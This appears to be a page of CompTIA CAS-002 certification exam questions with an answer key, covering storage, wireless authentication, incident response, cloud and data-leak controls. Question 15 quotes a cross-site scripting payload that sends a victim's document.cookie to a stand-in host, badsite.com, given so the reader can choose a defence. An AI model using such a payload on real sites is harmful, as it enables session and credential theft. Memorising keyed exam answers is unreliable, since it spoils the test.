CompTIA CAS-002

CompTIA Advanced Security Practitioner (CASP)

(Page 1 out of 36)
Showing 15 of 532 Questions
Exam Version: 6.0
Question No : 1 - Topic 1

Company ABCs SAN is nearing capacity, and will cause costly downtimes if servers run
out disk space. Which of the following is a more cost effective alternative to buying a new
SAN?

  • A. Enable multipath to increase availability
  • B. Enable deduplication on the storage pools
  • C. Implement snapshots to reduce virtual disk size
  • D. Implement replication to offsite datacenter

Answer : B



Question No : 2 - Topic 1

A systems administrator establishes a CIFS share on a UNIX device to share data to
Windows systems. The security authentication on the Windows domain is set to the highest
level. Windows users are stating that they cannot authenticate to the UNIX share. Which of
the following settings on the UNIX server would correct this problem?

  • A. Refuse LM and only accept NTLMv2
  • B. Accept only LM
  • C. Refuse NTLMv2 and accept LM
  • D. Accept only NTLM

Answer : A



Question No : 3 - Topic 1

Two universities are making their 802.11n wireless networks available to the other
universitys students. The infrastructure will pass the students credentials back to the
home school for authentication via the Internet.
The requirements are:
✑ Mutual authentication of clients and authentication server
✑ The design should not limit connection speeds
✑ Authentication must be delegated to the home school
✑ No passwords should be sent unencrypted
The following design was implemented:
WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security
RADIUS proxy servers will be used to forward authentication requests to the home school
The RADIUS servers will have certificates from a common public certificate authority
A strong shared secret will be used for RADIUS server authentication
Which of the following security considerations should be added to the design?

  • A. The transport layer between the RADIUS servers should be secured
  • B. WPA Enterprise should be used to decrease the network overhead
  • C. The RADIUS servers should have local accounts for the visiting students
  • D. Students should be given certificates to use for authentication to the network

Answer : A



Question No : 4 - Topic 1

A large organization has recently suffered a massive credit card breach. During the months
of Incident Response, there were multiple attempts to assign blame for whose fault it was
that the incident occurred. In which part of the incident response phase would this be
addressed in a controlled and productive manner?

  • A. During the Identification Phase
  • B. During the Lessons Learned phase
  • C. During the Containment Phase
  • D. During the Preparation Phase

Answer : B



Question No : 5 - Topic 1

Three companies want to allow their employees to seamlessly connect to each others
wireless corporate networks while keeping one consistent wireless client configuration.
Each company wants to maintain its own authentication infrastructure and wants to ensure
that an employee who is visiting the other two companies is authenticated by the home
office when connecting to the other companies wireless network. All three companies have
agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of
the following should the three companies implement?

  • A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.
  • B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.
  • C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.
  • D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Answer : A



Question No : 6 - Topic 1

A university requires a significant increase in web and database server resources for one
week, twice a year, to handle student registration. The web servers remain idle for the rest
of the year. Which of the following is the MOST cost effective way for the university to
securely handle student registration?

  • A. Virtualize the web servers locally to add capacity during registration.
  • B. Move the database servers to an elastic private cloud while keeping the web servers local.
  • C. Move the database servers and web servers to an elastic private cloud.
  • D. Move the web servers to an elastic public cloud while keeping the database servers local.

Answer : D



Question No : 7 - Topic 1

A security administrator wants to prevent sensitive data residing on corporate laptops and
desktops from leaking outside of the corporate network. The company has already
implemented full-disk encryption and has disabled all peripheral devices on its desktops
and laptops. Which of the following additional controls MUST be implemented to minimize
the risk of data leakage? (Select TWO).

  • A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.
  • B. A DLP gateway should be installed at the company border.
  • C. Strong authentication should be implemented via external biometric devices.
  • D. Full-tunnel VPN should be required for all network communication.
  • E. Full-drive file hashing should be implemented with hashes stored on separate storage.
  • F. Split-tunnel VPN should be enforced when transferring sensitive data.

Answer : B,D



Question No : 8 - Topic 1

The risk manager has requested a security solution that is centrally managed, can easily
be updated, and protects end users' workstations from both known and unknown malicious
attacks when connected to either the office or home network. Which of the following would
BEST meet this requirement?

  • A. HIPS
  • B. UTM
  • C. Antivirus
  • D. NIPS
  • E. DLP

Answer : A



Question No : 9 - Topic 1

The source workstation image for new accounting PCs has begun blue-screening. A
technician notices that the date/time stamp of the image source appears to have changed.
The desktop support director has asked the Information Security department to determine if
any changes were made to the source image. Which of the following methods would BEST
help with this process? (Select TWO).

  • A. Retrieve source system image from backup and run file comparison analysis on the two images.
  • B. Parse all images to determine if extra data is hidden using steganography.
  • C. Calculate a new hash and compare it with the previously captured image hash.
  • D. Ask desktop support if any changes to the images were made.
  • E. Check key system files to see if date/time stamp is in the past six months.

Answer : A,C



Question No : 10 - Topic 1

A security administrator notices a recent increase in workstations becoming compromised
by malware. Often, the malware is delivered via drive-by downloads, from malware hosting
websites, and is not being detected by the corporate antivirus. Which of the following
solutions would provide the BEST protection for the company?

  • A. Increase the frequency of antivirus downloads and install updates to all workstations.
  • B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections.
  • C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
  • D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network.

Answer : B



Question No : 11 - Topic 1

A security consultant is conducting a network assessment and wishes to discover any
legacy backup Internet connections the network may have. Where would the consultant
find this information and why would it be valuable?

  • A. This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection.
  • B. This information can be found by calling the regional Internet registry, and is valuable because backup connections typically do not require VPN access to the network.
  • C. This information can be found by accessing telecom billing records, and is valuable because backup connections typically have much lower latency than primary connections.
  • D. This information can be found by querying the networks DNS servers, and is valuable because backup DNS servers typically allow recursive queries from Internet hosts.

Answer : A



Question No : 12 - Topic 1

The helpdesk department desires to roll out a remote support application for internal use on
all company computers. This tool should allow remote desktop sharing, system log
gathering, chat, hardware logging, inventory management, and remote registry access. The
risk management team has been asked to review vendor responses to the RFQ. Which of
the following questions is the MOST important?

  • A. What are the protections against MITM?
  • B. What accountability is built into the remote support application?
  • C. What encryption standards are used in tracking database?
  • D. What snapshot or “undo” features are present in the application?
  • E. What encryption standards are used in remote desktop and file transfer functionality?

Answer : B



Question No : 13 - Topic 1

The helpdesk manager wants to find a solution that will enable the helpdesk staff to better
serve company employees who call with computer-related problems. The helpdesk staff is
currently unable to perform effective troubleshooting and relies on callers to describe their
technology problems. Given that the helpdesk staff is located within the company
headquarters and 90% of the callers are telecommuters, which of the following tools should
the helpdesk manager use to make the staff more effective at troubleshooting while at the
same time reducing company costs? (Select TWO).

  • A. Web cameras
  • B. Email
  • C. Instant messaging
  • D. BYOD
  • E. Desktop sharing
  • F. Presence

Answer : C,E



Question No : 14 - Topic 1

A new internal network segmentation solution will be implemented into the enterprise that
consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that
it takes three changes to deploy a new application onto the network before it is operational.
Security now has a significant effect on overall availability. Which of the following would be
the FIRST process to perform as a result of these findings?

  • A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructure on other projects.
  • B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availability issues. Decrease the current SLA expectations to match the new solution.
  • C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the review ask them to review the control effectiveness.
  • D. Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution.

Answer : D



Question No : 15 - Topic 1

A security administrator notices the following line in a server's security log:
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cooki
e</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the
application that is running on the server. Which of the following should the security
administrator implement to prevent this particular attack?

  • A. WAF
  • B. Input validation
  • C. SIEM
  • D. Sandboxing
  • E. DAM

Answer : A



(Page 1 out of 36)
Showing of 532 Questions
Exam Version: 6.0